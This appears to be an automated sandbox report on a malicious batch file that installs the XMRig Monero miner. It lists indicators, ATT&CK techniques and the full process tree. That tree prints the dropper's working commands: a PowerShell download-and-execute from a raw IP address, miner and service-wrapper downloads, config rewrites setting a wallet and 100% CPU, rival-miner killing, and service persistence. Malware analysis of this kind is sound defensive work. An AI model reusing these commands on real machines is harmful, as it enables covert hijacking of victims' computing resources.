xmrig | 9646675a0d5cb5ccf4aa9408fc698bf5d020d27015c69c9c1ab0e2290137fdd5

Analysis

max time kernel
1049s
max time network
1046s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
01/07/2024, 17:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

15468118625473.bat
Size

524B
MD5

92b307667679cc4bca93a2417be6137b
SHA1

5347620d753e52dbd274d04ae87356e09fe1c16d
SHA256

9646675a0d5cb5ccf4aa9408fc698bf5d020d27015c69c9c1ab0e2290137fdd5
SHA512

d99751550c337010791b8522ce1966384b41b2f17d6bfaf89034ce9ef25e2648e99ce5b345c6858c79b7af65b357036b42ed88447bca5854644d12ce9cf8a791

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.254.97.190:2024/test.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral1/files/0x000700000001ac45-132.dat	family_xmrig
behavioral1/files/0x000700000001ac45-132.dat	xmrig
behavioral1/memory/2532-135-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-425-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-426-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-427-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-428-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-429-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-430-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-431-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-432-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-433-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-434-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-435-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-436-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-437-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-438-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-439-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-440-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-441-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-442-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-443-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-444-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-445-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-446-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-447-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-448-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-449-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-450-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-451-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-452-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-454-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-455-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-456-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-457-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-459-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-460-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-461-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-462-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-463-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-464-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-465-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-466-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-467-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-468-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-469-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-470-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-471-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-472-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-473-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-474-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-475-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-476-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-477-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-478-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-479-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-480-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-481-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-482-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-483-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-484-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-485-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-486-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4948-487-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
1	292	powershell.exe
4	5020	powershell.exe
6	3148	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
2532	xmrig.exe
3480	nssm.exe
4512	nssm.exe
492	nssm.exe
1532	nssm.exe
4920	nssm.exe
1168	nssm.exe
4968	nssm.exe
4948	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
3	raw.githubusercontent.com
4	raw.githubusercontent.com
6	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3776	sc.exe
4400	sc.exe
2296	sc.exe
2508	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3632	powershell.exe
1668	powershell.exe
2352	powershell.exe
1924	powershell.exe
1976	powershell.exe
2816	powershell.exe
5020	powershell.exe
4080	powershell.exe
4436	powershell.exe
508	powershell.exe
5056	powershell.exe
3148	powershell.exe
292	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
980	Process not Found
932	timeout.exe
5108	timeout.exe
1488	timeout.exe
5044	Process not Found
592	Process not Found
4184	timeout.exe
3520	timeout.exe
4244	Process not Found
1280	Process not Found
1520	timeout.exe
3532	timeout.exe
4748	timeout.exe
4496	timeout.exe
1240	timeout.exe
2808	timeout.exe
1216	Process not Found
1472	timeout.exe
2532	timeout.exe
2752	timeout.exe
984	Process not Found
4100	Process not Found
4084	timeout.exe
3464	Process not Found
3268	Process not Found
1200	timeout.exe
3904	timeout.exe
380	timeout.exe
3012	timeout.exe
1784	timeout.exe
4532	timeout.exe
5000	timeout.exe
4352	timeout.exe
4484	Process not Found
2512	timeout.exe
5052	timeout.exe
4944	timeout.exe
1692	Process not Found
4000	Process not Found
2928	Process not Found
1036	timeout.exe
4524	timeout.exe
3280	Process not Found
3924	timeout.exe
4004	Process not Found
4500	timeout.exe
1580	Process not Found
3580	Process not Found
2308	timeout.exe
4712	Process not Found
1356	timeout.exe
3324	timeout.exe
2832	timeout.exe
2152	timeout.exe
3532	Process not Found
2716	Process not Found
1684	Process not Found
1736	timeout.exe
4176	timeout.exe
3504	timeout.exe
936	Process not Found
2308	Process not Found
4188	Process not Found
3056	Process not Found

Kills process with taskkill 1 IoCs

evasion

pid	Process
2040	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
292	powershell.exe
292	powershell.exe
292	powershell.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe
508	powershell.exe
508	powershell.exe
508	powershell.exe
2352	powershell.exe
2352	powershell.exe
2352	powershell.exe
3632	powershell.exe
3632	powershell.exe
3632	powershell.exe
4436	powershell.exe
4436	powershell.exe
4436	powershell.exe
1924	powershell.exe
1924	powershell.exe
1924	powershell.exe
5056	powershell.exe
5056	powershell.exe
5056	powershell.exe
1976	powershell.exe
1976	powershell.exe
1976	powershell.exe
1668	powershell.exe
1668	powershell.exe
1668	powershell.exe
2816	powershell.exe
2816	powershell.exe
2816	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
4080	powershell.exe
4080	powershell.exe
4080	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	292	powershell.exe
Token: SeDebugPrivilege	2040	taskkill.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	508	powershell.exe
Token: SeDebugPrivilege	2352	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	4436	powershell.exe
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeDebugPrivilege	1668	powershell.exe
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeDebugPrivilege	3148	powershell.exe
Token: SeDebugPrivilege	4080	powershell.exe
Token: SeLockMemoryPrivilege	4948	xmrig.exe
Token: SeIncreaseQuotaPrivilege	2308	WMIC.exe
Token: SeSecurityPrivilege	2308	WMIC.exe
Token: SeTakeOwnershipPrivilege	2308	WMIC.exe
Token: SeLoadDriverPrivilege	2308	WMIC.exe
Token: SeSystemProfilePrivilege	2308	WMIC.exe
Token: SeSystemtimePrivilege	2308	WMIC.exe
Token: SeProfSingleProcessPrivilege	2308	WMIC.exe
Token: SeIncBasePriorityPrivilege	2308	WMIC.exe
Token: SeCreatePagefilePrivilege	2308	WMIC.exe
Token: SeBackupPrivilege	2308	WMIC.exe
Token: SeRestorePrivilege	2308	WMIC.exe
Token: SeShutdownPrivilege	2308	WMIC.exe
Token: SeDebugPrivilege	2308	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2308	WMIC.exe
Token: SeRemoteShutdownPrivilege	2308	WMIC.exe
Token: SeUndockPrivilege	2308	WMIC.exe
Token: SeManageVolumePrivilege	2308	WMIC.exe
Token: 33	2308	WMIC.exe
Token: 34	2308	WMIC.exe
Token: 35	2308	WMIC.exe
Token: 36	2308	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2308	WMIC.exe
Token: SeSecurityPrivilege	2308	WMIC.exe
Token: SeTakeOwnershipPrivilege	2308	WMIC.exe
Token: SeLoadDriverPrivilege	2308	WMIC.exe
Token: SeSystemProfilePrivilege	2308	WMIC.exe
Token: SeSystemtimePrivilege	2308	WMIC.exe
Token: SeProfSingleProcessPrivilege	2308	WMIC.exe
Token: SeIncBasePriorityPrivilege	2308	WMIC.exe
Token: SeCreatePagefilePrivilege	2308	WMIC.exe
Token: SeBackupPrivilege	2308	WMIC.exe
Token: SeRestorePrivilege	2308	WMIC.exe
Token: SeShutdownPrivilege	2308	WMIC.exe
Token: SeDebugPrivilege	2308	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2308	WMIC.exe
Token: SeRemoteShutdownPrivilege	2308	WMIC.exe
Token: SeUndockPrivilege	2308	WMIC.exe
Token: SeManageVolumePrivilege	2308	WMIC.exe
Token: 33	2308	WMIC.exe
Token: 34	2308	WMIC.exe
Token: 35	2308	WMIC.exe
Token: 36	2308	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4152	WMIC.exe
Token: SeSecurityPrivilege	4152	WMIC.exe
Token: SeTakeOwnershipPrivilege	4152	WMIC.exe
Token: SeLoadDriverPrivilege	4152	WMIC.exe
Token: SeSystemProfilePrivilege	4152	WMIC.exe
Token: SeSystemtimePrivilege	4152	WMIC.exe
Token: SeProfSingleProcessPrivilege	4152	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4948	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4864 wrote to memory of 292	4864	cmd.exe	75
PID 4864 wrote to memory of 292	4864	cmd.exe	75
PID 292 wrote to memory of 4412	292	powershell.exe	76
PID 292 wrote to memory of 4412	292	powershell.exe	76
PID 4412 wrote to memory of 4660	4412	cmd.exe	77
PID 4412 wrote to memory of 4660	4412	cmd.exe	77
PID 4660 wrote to memory of 2412	4660	net.exe	78
PID 4660 wrote to memory of 2412	4660	net.exe	78
PID 4412 wrote to memory of 2628	4412	cmd.exe	79
PID 4412 wrote to memory of 2628	4412	cmd.exe	79
PID 4412 wrote to memory of 2960	4412	cmd.exe	80
PID 4412 wrote to memory of 2960	4412	cmd.exe	80
PID 4412 wrote to memory of 1644	4412	cmd.exe	81
PID 4412 wrote to memory of 1644	4412	cmd.exe	81
PID 4412 wrote to memory of 3464	4412	cmd.exe	82
PID 4412 wrote to memory of 3464	4412	cmd.exe	82
PID 4412 wrote to memory of 3472	4412	cmd.exe	83
PID 4412 wrote to memory of 3472	4412	cmd.exe	83
PID 4412 wrote to memory of 2296	4412	cmd.exe	84
PID 4412 wrote to memory of 2296	4412	cmd.exe	84
PID 4412 wrote to memory of 2508	4412	cmd.exe	85
PID 4412 wrote to memory of 2508	4412	cmd.exe	85
PID 4412 wrote to memory of 2040	4412	cmd.exe	86
PID 4412 wrote to memory of 2040	4412	cmd.exe	86
PID 4412 wrote to memory of 5020	4412	cmd.exe	88
PID 4412 wrote to memory of 5020	4412	cmd.exe	88
PID 4412 wrote to memory of 508	4412	cmd.exe	89
PID 4412 wrote to memory of 508	4412	cmd.exe	89
PID 4412 wrote to memory of 2352	4412	cmd.exe	90
PID 4412 wrote to memory of 2352	4412	cmd.exe	90
PID 4412 wrote to memory of 2532	4412	cmd.exe	91
PID 4412 wrote to memory of 2532	4412	cmd.exe	91
PID 4412 wrote to memory of 5000	4412	cmd.exe	92
PID 4412 wrote to memory of 5000	4412	cmd.exe	92
PID 5000 wrote to memory of 3632	5000	cmd.exe	93
PID 5000 wrote to memory of 3632	5000	cmd.exe	93
PID 3632 wrote to memory of 3996	3632	powershell.exe	94
PID 3632 wrote to memory of 3996	3632	powershell.exe	94
PID 4412 wrote to memory of 4436	4412	cmd.exe	95
PID 4412 wrote to memory of 4436	4412	cmd.exe	95
PID 4412 wrote to memory of 1924	4412	cmd.exe	96
PID 4412 wrote to memory of 1924	4412	cmd.exe	96
PID 4412 wrote to memory of 5056	4412	cmd.exe	97
PID 4412 wrote to memory of 5056	4412	cmd.exe	97
PID 4412 wrote to memory of 1976	4412	cmd.exe	98
PID 4412 wrote to memory of 1976	4412	cmd.exe	98
PID 4412 wrote to memory of 1668	4412	cmd.exe	99
PID 4412 wrote to memory of 1668	4412	cmd.exe	99
PID 4412 wrote to memory of 2816	4412	cmd.exe	100
PID 4412 wrote to memory of 2816	4412	cmd.exe	100
PID 4412 wrote to memory of 3148	4412	cmd.exe	101
PID 4412 wrote to memory of 3148	4412	cmd.exe	101
PID 4412 wrote to memory of 4080	4412	cmd.exe	102
PID 4412 wrote to memory of 4080	4412	cmd.exe	102
PID 4412 wrote to memory of 3776	4412	cmd.exe	103
PID 4412 wrote to memory of 3776	4412	cmd.exe	103
PID 4412 wrote to memory of 4400	4412	cmd.exe	104
PID 4412 wrote to memory of 4400	4412	cmd.exe	104
PID 4412 wrote to memory of 3480	4412	cmd.exe	105
PID 4412 wrote to memory of 3480	4412	cmd.exe	105
PID 4412 wrote to memory of 4512	4412	cmd.exe	106
PID 4412 wrote to memory of 4512	4412	cmd.exe	106
PID 4412 wrote to memory of 492	4412	cmd.exe	107
PID 4412 wrote to memory of 492	4412	cmd.exe	107

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\15468118625473.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://185.254.97.190:2024/test.txt', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp72A0.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4412
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4660
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:2412
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:2628
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:2960
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:1644
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:3464
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:3472
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:2296
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:2508
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2040
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2352
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:2532
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5000
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3632
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:3996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4436
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1924
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Ybqdfvlh\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1976
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1668
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4080
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3776
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4400
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:3480
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:4512
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:492
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:1532
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:4920
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:1168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2308
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4152
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2888
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4028
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3532
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1360
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4640
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:688
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3912
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2688
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4504
- C:\Windows\system32\timeout.exe
  timeout /t 1
